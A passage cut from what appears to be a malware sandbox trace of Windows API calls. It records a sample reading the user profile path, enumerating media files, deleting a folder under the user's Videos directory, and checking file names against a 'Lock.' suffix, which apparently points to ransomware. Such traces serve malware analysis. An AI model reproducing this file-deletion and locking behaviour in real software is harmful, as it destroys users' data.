ftLastWriteTime.dwLowDateTime=0x4eab21f0, ftLastWriteTime.dwHighDateTime=0x1d5cd9f, nFileSizeHigh=0x0, nFileSizeLow=0xe65e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="_WyA61BV8_TdgoCYACg.mp4", cAlternateFileName="_WYA61~1.MP4")) returned 0 [0214.115] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0214.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a750d0 | out: hHeap=0x2af0000) returned 1 [0214.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0214.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0214.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.116] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0214.116] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf60 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0214.116] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0214.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0214.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0214.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0214.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0214.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0214.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a75000 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0214.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0214.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0214.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0214.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0214.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0214.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0214.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0214.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0214.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0214.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0214.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0214.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0214.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0214.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0214.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb160 [0214.118] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/SpSJ7tN62PCD2h Y", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y", lpFilePart=0x8cf650*="SpSJ7tN62PCD2h Y") returned 0x27 [0214.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb160 | out: hHeap=0x2af0000) returned 1 [0214.118] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y" (normalized: "c:\\users\\fd1hvy\\videos\\spsj7tn62pcd2h y")) returned 0x10 [0214.118] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Videos\\SpSJ7tN62PCD2h Y", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0214.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75000 | out: hHeap=0x2af0000) returned 1 [0214.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0214.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0214.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0214.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0214.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0214.716] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0214.716] TranslateMessage (lpMsg=0x8cf968) returned 0 [0214.716] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0214.716] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0214.716] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0214.716] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0214.716] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.716] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0214.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0214.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0214.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0214.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0214.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0214.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0214.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0214.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0214.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0214.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0214.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0214.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0214.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0214.717] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SuK1W_b3QKmuHjRF.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0214.717] CompareStringW 